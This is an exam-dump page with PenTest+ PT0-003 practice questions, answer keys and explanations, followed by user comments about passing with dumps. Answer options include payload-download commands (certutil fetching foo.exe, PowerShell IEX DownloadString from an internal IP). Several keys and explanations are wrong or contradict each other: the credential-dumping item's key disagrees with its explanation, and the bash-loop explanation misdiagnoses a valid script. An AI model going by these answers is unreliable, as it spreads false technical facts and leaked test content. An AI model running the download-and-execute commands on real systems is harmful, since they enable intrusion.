Amazon
Avaya
Cisco
CompTIA
CrowdStrike
EC-Council
EXIN
Fortinet
Google
ISC
ISC2
ITIL
Juniper
Microsoft
NVIDIA
Okta
Palo Alto Networks
Salesforce
SAP
ServiceNow
All Vendors
  1. Home
  2. CompTIA
  3. PT0-003

CompTIA PT0-003 (page: 8)

CompTIA PenTest+

Updated 12-Apr-2026

Page 8 of 49 PT0-003 PDF — 271 Questions

[Attacks and Exploits]
During a web application assessment, a penetration tester identifies an input field that allows JavaScript injection. The tester inserts a line of JavaScript that results in a prompt, presenting a text box when browsing to the page going forward.
Which of the following types of attacks is this an example of?

  1. SQL injection
  2. SSRF
  3. XSS
  4. Server-side template injection

Answer(s): C

Explanation:

Cross-Site Scripting (XSS) is an attack that involves injecting malicious scripts into web pages viewed by other users. Here's why option C is correct:
XSS (Cross-Site Scripting): This attack involves injecting JavaScript into a web application, which is then executed by the user's browser. The scenario describes injecting a JavaScript prompt, which is a typical XSS payload.
SQL Injection: This involves injecting SQL commands to manipulate the database and does not relate to JavaScript injection.
SSRF (Server-Side Request Forgery): This attack tricks the server into making requests to unintended locations, which is not related to client-side JavaScript execution. Server-Side Template Injection: This involves injecting code into server-side templates, not JavaScript that executes in the user's browser.
Reference from Pentest:
Horizontall HTB: Demonstrates identifying and exploiting XSS vulnerabilities in web applications. Luke HTB: Highlights the process of testing for XSS by injecting scripts and observing their execution in the browser.



A penetration tester is working on an engagement in which a main objective is to collect confidential information that could be used to exfiltrate data and perform a ransomware attack. During the engagement, the tester is able to obtain an internal foothold on the target network.
Which of the following is the next task the tester should complete to accomplish the objective?

  1. Initiate a social engineering campaign.
  2. Perform credential dumping.
  3. Compromise an endpoint.
  4. Share enumeration.

Answer(s): D

Explanation:

Given that the penetration tester has already obtained an internal foothold on the target network, the next logical step to achieve the objective of collecting confidential information and potentially exfiltrating data or performing a ransomware attack is to perform credential dumping. Here's why:
Credential Dumping:
Purpose: Credential dumping involves extracting password hashes and plaintext passwords from compromised systems. These credentials can be used to gain further access to sensitive data and critical systems within the network.
Tools: Common tools used for credential dumping include Mimikatz, Windows Credential Editor, and ProcDump.

Impact: With these credentials, the tester can move laterally across the network, escalate privileges, and access confidential information.
Comparison with Other Options:
Initiate a Social Engineering Campaign (A): Social engineering is typically an initial access technique rather than a follow-up action after gaining internal access. Compromise an Endpoint (C): The tester already has a foothold, so compromising another endpoint is less direct than credential dumping for accessing sensitive information. Share Enumeration (D): While share enumeration can provide useful information, it is less impactful than credential dumping in terms of gaining further access and achieving the main objective. Performing credential dumping is the most effective next step to escalate privileges and access sensitive data, making it the best choice.



[Attacks and Exploits]
During a penetration test, the tester identifies several unused services that are listening on all targeted internal laptops.
Which of the following technical controls should the tester recommend to reduce the risk of compromise?

  1. Multifactor authentication
  2. Patch management
  3. System hardening
  4. Network segmentation

Answer(s): C

Explanation:

When a penetration tester identifies several unused services listening on targeted internal laptops, the most appropriate recommendation to reduce the risk of compromise is system hardening. Here's why:
System Hardening:
Purpose: System hardening involves securing systems by reducing their surface of vulnerability. This includes disabling unnecessary services, applying security patches, and configuring systems securely. Impact: By disabling unused services, the attack surface is minimized, reducing the risk of these services being exploited by attackers.
Comparison with Other Controls:
Multifactor Authentication (A): While useful for securing authentication, it does not address the issue of unused services running on the system.
Patch Management (B): Important for addressing known vulnerabilities but not specifically related to disabling unused services.
Network Segmentation (D): Helps in containing breaches but does not directly address the issue of unnecessary services.
System hardening is the most direct control for reducing the risk posed by unused services, making it the best recommendation.



[Attacks and Exploits]
A penetration tester writes the following script to enumerate a 1724 network:

1 #!/bin/bash
2 for i in {1..254}; do
3 ping -c1 192.168.1.$i
4 done

The tester executes the script, but it fails with the following error:

-bash: syntax error near unexpected token `ping'

Which of the following should the tester do to fix the error?

  1. Add do after line 2.
  2. Replace {1..254} with $(seq 1 254).
  3. Replace bash with tsh.
  4. Replace $i with ${i}.

Answer(s): B

Explanation:

The syntax (1..254) is incorrect in Bash, as it uses brace expansion or seq for looping. The correct syntax should be:

for i in $(seq 1 254)
Also, the missing do is an issue, but the syntax error mentioned points specifically to the loop structure. Fixing the sequence format resolves it.

Corrected script:

#!/bin/bash for i in $(seq 1 254); do ping -c1 192.168.1.$i done
From the CompTIA PenTest+ PT0-003 Official Study Guide (Chapter 4 ­ Scanning & Enumeration):
"Bash scripting is commonly used for automation in enumeration. The 'seq' command generates a sequence of numbers for iteration in loops."


Reference:

CompTIA PenTest+ PT0-003 Official Study Guide, Chapter 4



[Attacks and Exploits]
A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access.
Which of the following commands should the penetration tester use?

  1. powershell.exe impo C:\tools\foo.ps1
  2. certutil.exe -f https://192.168.0.1/foo.exe bad.exe
  3. powershell.exe -noni -encode IEX.Downloadstring("http://172.16.0.1/")
  4. rundll32.exe c:\path\foo.dll,functName

Answer(s): B

Explanation:

To execute a payload and gain additional access, the penetration tester should use certutil.exe.
Here's why:
Using certutil.exe:
Purpose: certutil.exe is a built-in Windows utility that can be used to download files from a remote server, making it useful for fetching and executing payloads. Command: certutil.exe -f https://192.168.0.1/foo.exe bad.exe downloads the file foo.exe from the specified URL and saves it as bad.exe.
Comparison with Other Commands:
powershell.exe impo C:\tools\foo.ps1 (A): Incorrect syntax and not as direct as using certutil for downloading files.
powershell.exe -noni -encode IEX.Downloadstring("http://172.16.0.1/") (C): Incorrect syntax for downloading and executing a script.
rundll32.exe c:\path\foo.dll,functName (D): Used for executing DLLs, not suitable for downloading a payload.
Using certutil.exe to download and execute a payload is a common and effective method.



Page 8 of 49

Share your comments for CompTIA PT0-003 exam with other users:

John 10/12/2023 12:30:00 PM

great material
Anonymous


Dinesh 8/1/2023 2:26:00 PM

could you please upload sap c_arsor_2302 questions? it will be very much helpful.
Anonymous


LBert 6/19/2023 10:23:00 AM

vraag 20c: rsa veilig voor symmtrische cryptografie? antwoord c is toch fout. rsa is voor asymmetrische cryptogafie??
NETHERLANDS


g 12/22/2023 1:51:00 PM

so far good
UNITED STATES


Milos 8/4/2023 9:33:00 AM

question 31 has obviously wrong answers. tls and ssl are used to encrypt data at transit, not at rest.
Serbia And Montenegro


Diksha 9/25/2023 2:32:00 AM

pls provide dump for 1z0-1080-23 planning exams
Anonymous


H 7/17/2023 4:28:00 AM

could you please upload the exam?
Anonymous


Anonymous 9/14/2023 4:47:00 AM

please upload this
UNITED STATES


Naveena 1/13/2024 9:55:00 AM

good material
Anonymous


WildWilly 1/19/2024 10:43:00 AM

lets see if this is good stuff...
Anonymous


Lavanya 11/2/2023 1:53:00 AM

useful information
UNITED STATES


Moussa 12/12/2023 5:52:00 AM

intéressant
BURKINA FASO


Madan 6/22/2023 9:22:00 AM

thank you for making the interactive questions
Anonymous


Vavz 11/2/2023 6:51:00 AM

questions are accurate
Anonymous


Su 11/23/2023 4:34:00 AM

i need questions/dumps for this exam.
Anonymous


LuvSN 7/16/2023 11:19:00 AM

i need this exam, when will it be uploaded
ROMANIA


Mihai 7/19/2023 12:03:00 PM

i need the dumps !
Anonymous


Wafa 11/13/2023 3:06:00 AM

very helpful
Anonymous


Alokit 7/3/2023 2:13:00 PM

good source
Anonymous


Show-Stopper 7/27/2022 11:19:00 PM

my 3rd test and passed on first try. hats off to this brain dumps site.
UNITED STATES


Michelle 6/23/2023 4:06:00 AM

please upload it
Anonymous


Lele 11/20/2023 11:55:00 AM

does anybody know if are these real exam questions?
EUROPEAN UNION


Girish Jain 10/9/2023 12:01:00 PM

are these questions similar to actual questions in the exam? because they seem to be too easy
Anonymous


Phil 12/8/2022 11:16:00 PM

i have a lot of experience but what comes in the exam is totally different from the practical day to day tasks. so i thought i would rather rely on these brain dumps rather failing the exam.
GERMANY


BV 6/8/2023 4:35:00 AM

good questions
NETHERLANDS


krishna 12/19/2023 2:05:00 AM

valied exam dumps. they were very helpful and i got a pretty good score. i am very grateful for this service and exam questions
Anonymous


Pie 9/3/2023 4:56:00 AM

will it help?
INDIA


Lucio 10/6/2023 1:45:00 PM

very useful to verify knowledge before exam
POLAND


Ajay 5/17/2023 4:54:00 AM

good stuffs
Anonymous


TestPD1 8/10/2023 12:19:00 PM

question 17 : responses arent b and c ?
EUROPEAN UNION


Nhlanhla 12/13/2023 5:26:00 AM

just passed the exam on my first try using these dumps.
Anonymous


Rizwan 1/6/2024 2:18:00 AM

very helpful
INDIA


Yady 5/24/2023 10:40:00 PM

these questions look good.
SINGAPORE


Kettie 10/12/2023 1:18:00 AM

this is very helpful content
Anonymous


AI Tutor 👋 I’m here to help!